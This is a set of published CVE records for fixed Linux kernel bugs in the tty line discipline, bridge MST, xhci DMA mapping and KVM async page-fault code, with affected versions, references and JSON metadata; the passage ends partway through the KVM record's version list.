In the Linux kernel, the following vulnerability has been resolved: tty: add the option to have a tty reject a new ldisc ... and use it to limit the virtual terminals to just N_TTY. They are kind of special, and in particular, the "con_write()" routine violates the "writes cannot sleep" rule that some ldiscs rely on. This avoids the BUG: sleeping function called from invalid context at kernel/printk/printk.c:2659 when N_GSM has been attached to a virtual console, and gsmld_write() calls con_write() while holding a spinlock, and con_write() then tries to get the console lock.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3c6332f3bb1578b5b…
	https://git.kernel.org/stable/c/287b569a5b914903b…
	https://git.kernel.org/stable/c/5920ac19964f9e201…
	https://git.kernel.org/stable/c/6bd23e0c2bb6c65d4…

Impacted products

Vendor

Product

Version

Linux

Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 3c6332f3bb1578b5b10ac2561247b1d6272ae937 (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 287b569a5b914903ba7c438a3c0dbc3410ebb409 (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 5920ac19964f9e20181f63b410d9200ddbf8dc86 (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 6bd23e0c2bb6c65d4f5754d1456bc9a4427fc59b (git)

Linux

Affected: 2.6.35
Unaffected: 0 , < 2.6.35 (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:30.295Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3c6332f3bb1578b5b10ac2561247b1d6272ae937"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/287b569a5b914903ba7c438a3c0dbc3410ebb409"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5920ac19964f9e20181f63b410d9200ddbf8dc86"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6bd23e0c2bb6c65d4f5754d1456bc9a4427fc59b"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40966",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:03:10.358016Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:23.131Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/tty_ldisc.c",
            "drivers/tty/vt/vt.c",
            "include/linux/tty_driver.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3c6332f3bb1578b5b10ac2561247b1d6272ae937",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "287b569a5b914903ba7c438a3c0dbc3410ebb409",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "5920ac19964f9e20181f63b410d9200ddbf8dc86",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "6bd23e0c2bb6c65d4f5754d1456bc9a4427fc59b",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/tty_ldisc.c",
            "drivers/tty/vt/vt.c",
            "include/linux/tty_driver.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.35"
            },
            {
              "lessThan": "2.6.35",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: add the option to have a tty reject a new ldisc\n\n... and use it to limit the virtual terminals to just N_TTY.  They are\nkind of special, and in particular, the \"con_write()\" routine violates\nthe \"writes cannot sleep\" rule that some ldiscs rely on.\n\nThis avoids the\n\n   BUG: sleeping function called from invalid context at kernel/printk/printk.c:2659\n\nwhen N_GSM has been attached to a virtual console, and gsmld_write()\ncalls con_write() while holding a spinlock, and con_write() then tries\nto get the console lock."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:55.587Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3c6332f3bb1578b5b10ac2561247b1d6272ae937"
        },
        {
          "url": "https://git.kernel.org/stable/c/287b569a5b914903ba7c438a3c0dbc3410ebb409"
        },
        {
          "url": "https://git.kernel.org/stable/c/5920ac19964f9e20181f63b410d9200ddbf8dc86"
        },
        {
          "url": "https://git.kernel.org/stable/c/6bd23e0c2bb6c65d4f5754d1456bc9a4427fc59b"
        }
      ],
      "title": "tty: add the option to have a tty reject a new ldisc",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40966",
    "datePublished": "2024-07-12T12:32:06.122Z",
    "dateReserved": "2024-07-12T12:17:45.602Z",
    "dateUpdated": "2026-01-05T10:36:55.587Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40920 (GCVE-0-2024-40920)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:25 – Updated: 2025-11-03 21:57

Title

net: bridge: mst: fix suspicious rcu usage in br_mst_set_state

Summary

In the Linux kernel, the following vulnerability has been resolved: net: bridge: mst: fix suspicious rcu usage in br_mst_set_state I converted br_mst_set_state to RCU to avoid a vlan use-after-free but forgot to change the vlan group dereference helper. Switch to vlan group RCU deref helper to fix the suspicious rcu usage warning.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/caaa2129784a04dca…
	https://git.kernel.org/stable/c/7caefa2771722e654…
	https://git.kernel.org/stable/c/406bfc04b01ee47e4…
	https://git.kernel.org/stable/c/546ceb1dfdac86664…

Impacted products

Vendor

Product

Version

Linux

Affected: 8ca9a750fc711911ef616ceb627d07357b04545e , < caaa2129784a04dcade0ea92c12e6ff90bbd23d8 (git)
Affected: 4488617e5e995a09abe4d81add5fb165674edb59 , < 7caefa2771722e65496d85b62e1dc4442b7d1345 (git)
Affected: e43dd2b1ec746e105b7db5f9ad6ef14685a615a4 , < 406bfc04b01ee47e4c626f77ecc7d9f85135b166 (git)
Affected: 3a7c1661ae1383364cd6092d851f5e5da64d476b , < 546ceb1dfdac866648ec959cbc71d9525bd73462 (git)
Affected: a2b01e65d9ba8af2bb086d3b7288ca53a07249ac (git)

Linux

Affected: 6.1.93 , < 6.1.95 (semver)
Affected: 6.6.33 , < 6.6.35 (semver)
Affected: 6.9.3 , < 6.9.6 (semver)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:57:50.802Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/caaa2129784a04dcade0ea92c12e6ff90bbd23d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7caefa2771722e65496d85b62e1dc4442b7d1345"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/406bfc04b01ee47e4c626f77ecc7d9f85135b166"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/546ceb1dfdac866648ec959cbc71d9525bd73462"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40920",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:05:33.673278Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:03.619Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bridge/br_mst.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "caaa2129784a04dcade0ea92c12e6ff90bbd23d8",
              "status": "affected",
              "version": "8ca9a750fc711911ef616ceb627d07357b04545e",
              "versionType": "git"
            },
            {
              "lessThan": "7caefa2771722e65496d85b62e1dc4442b7d1345",
              "status": "affected",
              "version": "4488617e5e995a09abe4d81add5fb165674edb59",
              "versionType": "git"
            },
            {
              "lessThan": "406bfc04b01ee47e4c626f77ecc7d9f85135b166",
              "status": "affected",
              "version": "e43dd2b1ec746e105b7db5f9ad6ef14685a615a4",
              "versionType": "git"
            },
            {
              "lessThan": "546ceb1dfdac866648ec959cbc71d9525bd73462",
              "status": "affected",
              "version": "3a7c1661ae1383364cd6092d851f5e5da64d476b",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a2b01e65d9ba8af2bb086d3b7288ca53a07249ac",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bridge/br_mst.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.1.95",
              "status": "affected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThan": "6.6.35",
              "status": "affected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThan": "6.9.6",
              "status": "affected",
              "version": "6.9.3",
              "versionType": "semver"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "6.1.93",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "6.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "6.9.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: mst: fix suspicious rcu usage in br_mst_set_state\n\nI converted br_mst_set_state to RCU to avoid a vlan use-after-free\nbut forgot to change the vlan group dereference helper. Switch to vlan\ngroup RCU deref helper to fix the suspicious rcu usage warning."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:14.602Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/caaa2129784a04dcade0ea92c12e6ff90bbd23d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/7caefa2771722e65496d85b62e1dc4442b7d1345"
        },
        {
          "url": "https://git.kernel.org/stable/c/406bfc04b01ee47e4c626f77ecc7d9f85135b166"
        },
        {
          "url": "https://git.kernel.org/stable/c/546ceb1dfdac866648ec959cbc71d9525bd73462"
        }
      ],
      "title": "net: bridge: mst: fix suspicious rcu usage in br_mst_set_state",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40920",
    "datePublished": "2024-07-12T12:25:02.222Z",
    "dateReserved": "2024-07-12T12:17:45.582Z",
    "dateUpdated": "2025-11-03T21:57:50.802Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26964 (GCVE-0-2024-26964)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:19 – Updated: 2025-05-04 09:00

Title

usb: xhci: Add error handling in xhci_map_urb_for_dma

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: xhci: Add error handling in xhci_map_urb_for_dma Currently xhci_map_urb_for_dma() creates a temporary buffer and copies the SG list to the new linear buffer. But if the kzalloc_node() fails, then the following sg_pcopy_to_buffer() can lead to crash since it tries to memcpy to NULL pointer. So return -ENOMEM if kzalloc returns null pointer.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4a49d24fdec0a802a…
	https://git.kernel.org/stable/c/b2c898469dfc388f6…
	https://git.kernel.org/stable/c/620b6cf2f1a270f48…
	https://git.kernel.org/stable/c/962300a360d24c5be…
	https://git.kernel.org/stable/c/7b6cc33593d7ccfc3…
	https://git.kernel.org/stable/c/be95cc6d71dfd0cba…

Impacted products

Vendor

Product

Version

Linux

Affected: 2017a1e58472a27e532b9644b4a61dfe18f6baac , < 4a49d24fdec0a802aa686a567a3989a9fdf4e5dd (git)
Affected: 2017a1e58472a27e532b9644b4a61dfe18f6baac , < b2c898469dfc388f619c6c972a28466cbb1442ea (git)
Affected: 2017a1e58472a27e532b9644b4a61dfe18f6baac , < 620b6cf2f1a270f48d38e6b8ce199c1acb3e90f4 (git)
Affected: 2017a1e58472a27e532b9644b4a61dfe18f6baac , < 962300a360d24c5be5a188cda48da58a37e4304d (git)
Affected: 2017a1e58472a27e532b9644b4a61dfe18f6baac , < 7b6cc33593d7ccfc3011b290849cfa899db46757 (git)
Affected: 2017a1e58472a27e532b9644b4a61dfe18f6baac , < be95cc6d71dfd0cba66e3621c65413321b398052 (git)

Linux

Affected: 5.11
Unaffected: 0 , < 5.11 (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26964",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T14:41:33.785567Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T14:41:41.475Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.629Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4a49d24fdec0a802aa686a567a3989a9fdf4e5dd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b2c898469dfc388f619c6c972a28466cbb1442ea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/620b6cf2f1a270f48d38e6b8ce199c1acb3e90f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/962300a360d24c5be5a188cda48da58a37e4304d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7b6cc33593d7ccfc3011b290849cfa899db46757"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be95cc6d71dfd0cba66e3621c65413321b398052"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/host/xhci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4a49d24fdec0a802aa686a567a3989a9fdf4e5dd",
              "status": "affected",
              "version": "2017a1e58472a27e532b9644b4a61dfe18f6baac",
              "versionType": "git"
            },
            {
              "lessThan": "b2c898469dfc388f619c6c972a28466cbb1442ea",
              "status": "affected",
              "version": "2017a1e58472a27e532b9644b4a61dfe18f6baac",
              "versionType": "git"
            },
            {
              "lessThan": "620b6cf2f1a270f48d38e6b8ce199c1acb3e90f4",
              "status": "affected",
              "version": "2017a1e58472a27e532b9644b4a61dfe18f6baac",
              "versionType": "git"
            },
            {
              "lessThan": "962300a360d24c5be5a188cda48da58a37e4304d",
              "status": "affected",
              "version": "2017a1e58472a27e532b9644b4a61dfe18f6baac",
              "versionType": "git"
            },
            {
              "lessThan": "7b6cc33593d7ccfc3011b290849cfa899db46757",
              "status": "affected",
              "version": "2017a1e58472a27e532b9644b4a61dfe18f6baac",
              "versionType": "git"
            },
            {
              "lessThan": "be95cc6d71dfd0cba66e3621c65413321b398052",
              "status": "affected",
              "version": "2017a1e58472a27e532b9644b4a61dfe18f6baac",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/host/xhci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.11"
            },
            {
              "lessThan": "5.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Add error handling in xhci_map_urb_for_dma\n\nCurrently xhci_map_urb_for_dma() creates a temporary buffer and copies\nthe SG list to the new linear buffer. But if the kzalloc_node() fails,\nthen the following sg_pcopy_to_buffer() can lead to crash since it\ntries to memcpy to NULL pointer.\n\nSo return -ENOMEM if kzalloc returns null pointer."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:57.071Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4a49d24fdec0a802aa686a567a3989a9fdf4e5dd"
        },
        {
          "url": "https://git.kernel.org/stable/c/b2c898469dfc388f619c6c972a28466cbb1442ea"
        },
        {
          "url": "https://git.kernel.org/stable/c/620b6cf2f1a270f48d38e6b8ce199c1acb3e90f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/962300a360d24c5be5a188cda48da58a37e4304d"
        },
        {
          "url": "https://git.kernel.org/stable/c/7b6cc33593d7ccfc3011b290849cfa899db46757"
        },
        {
          "url": "https://git.kernel.org/stable/c/be95cc6d71dfd0cba66e3621c65413321b398052"
        }
      ],
      "title": "usb: xhci: Add error handling in xhci_map_urb_for_dma",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26964",
    "datePublished": "2024-05-01T05:19:28.437Z",
    "dateReserved": "2024-02-19T14:20:24.201Z",
    "dateUpdated": "2025-05-04T09:00:57.071Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26976 (GCVE-0-2024-26976)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:20 – Updated: 2025-05-04 09:01

Title

KVM: Always flush async #PF workqueue when vCPU is being destroyed

Summary

In the Linux kernel, the following vulnerability has been resolved: KVM: Always flush async #PF workqueue when vCPU is being destroyed Always flush the per-vCPU async #PF workqueue when a vCPU is clearing its completion queue, e.g. when a VM and all its vCPUs is being destroyed. KVM must ensure that none of its workqueue callbacks is running when the last reference to the KVM _module_ is put. Gifting a reference to the associated VM prevents the workqueue callback from dereferencing freed vCPU/VM memory, but does not prevent the KVM module from being unloaded before the callback completes. Drop the misguided VM refcount gifting, as calling kvm_put_kvm() from async_pf_execute() if kvm_put_kvm() flushes the async #PF workqueue will result in deadlock. async_pf_execute() can't return until kvm_put_kvm() finishes, and kvm_put_kvm() can't return until async_pf_execute() finishes: WARNING: CPU: 8 PID: 251 at virt/kvm/kvm_main.c:1435 kvm_put_kvm+0x2d/0x320 [kvm] Modules linked in: vhost_net vhost vhost_iotlb tap kvm_intel kvm irqbypass CPU: 8 PID: 251 Comm: kworker/8:1 Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 Workqueue: events async_pf_execute [kvm] RIP: 0010:kvm_put_kvm+0x2d/0x320 [kvm] Call Trace: <TASK> async_pf_execute+0x198/0x260 [kvm] process_one_work+0x145/0x2d0 worker_thread+0x27e/0x3a0 kthread+0xba/0xe0 ret_from_fork+0x2d/0x50 ret_from_fork_asm+0x11/0x20 </TASK> ---[ end trace 0000000000000000 ]--- INFO: task kworker/8:1:251 blocked for more than 120 seconds. Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/8:1 state:D stack:0 pid:251 ppid:2 flags:0x00004000 Workqueue: events async_pf_execute [kvm] Call Trace: <TASK> __schedule+0x33f/0xa40 schedule+0x53/0xc0 schedule_timeout+0x12a/0x140 __wait_for_common+0x8d/0x1d0 __flush_work.isra.0+0x19f/0x2c0 kvm_clear_async_pf_completion_queue+0x129/0x190 [kvm] kvm_arch_destroy_vm+0x78/0x1b0 [kvm] kvm_put_kvm+0x1c1/0x320 [kvm] async_pf_execute+0x198/0x260 [kvm] process_one_work+0x145/0x2d0 worker_thread+0x27e/0x3a0 kthread+0xba/0xe0 ret_from_fork+0x2d/0x50 ret_from_fork_asm+0x11/0x20 </TASK> If kvm_clear_async_pf_completion_queue() actually flushes the workqueue, then there's no need to gift async_pf_execute() a reference because all invocations of async_pf_execute() will be forced to complete before the vCPU and its VM are destroyed/freed. And that in turn fixes the module unloading bug as __fput() won't do module_put() on the last vCPU reference until the vCPU has been freed, e.g. if closing the vCPU file also puts the last reference to the KVM module. Note that kvm_check_async_pf_completion() may also take the work item off the completion queue and so also needs to flush the work queue, as the work will not be seen by kvm_clear_async_pf_completion_queue(). Waiting on the workqueue could theoretically delay a vCPU due to waiting for the work to complete, but that's a very, very small chance, and likely a very small delay. kvm_arch_async_page_present_queued() unconditionally makes a new request, i.e. will effectively delay entering the guest, so the remaining work is really just: trace_kvm_async_pf_completed(addr, cr2_or_gpa); __kvm_vcpu_wake_up(vcpu); mmput(mm); and mmput() can't drop the last reference to the page tables if the vCPU is still alive, i.e. the vCPU won't get stuck tearing down page tables. Add a helper to do the flushing, specifically to deal with "wakeup all" work items, as they aren't actually work items, i.e. are never placed in a workqueue. Trying to flush a bogus workqueue entry rightly makes __flush_work() complain (kudos to whoever added that sanity check). Note, commit 5f6de5cbebee ("KVM: Prevent module exit until al ---truncated---

Severity ?

7 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ab2c2f5d9576112ad…
	https://git.kernel.org/stable/c/82e25cc1c2e93c302…
	https://git.kernel.org/stable/c/f8730d6335e5f43d0…
	https://git.kernel.org/stable/c/83d3c5e309611ef59…
	https://git.kernel.org/stable/c/b54478d20375874ae…
	https://git.kernel.org/stable/c/a75afe480d4349c52…
	https://git.kernel.org/stable/c/4f3a3bce428fb439c…
	https://git.kernel.org/stable/c/caa9af2e27c275e08…
	https://git.kernel.org/stable/c/3d75b8aa5c29058a5…

Impacted products

Vendor

Product

Version

Linux

Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < ab2c2f5d9576112ad22cfd3798071cb74693b1f5 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 82e25cc1c2e93c3023da98be282322fc08b61ffb (git)
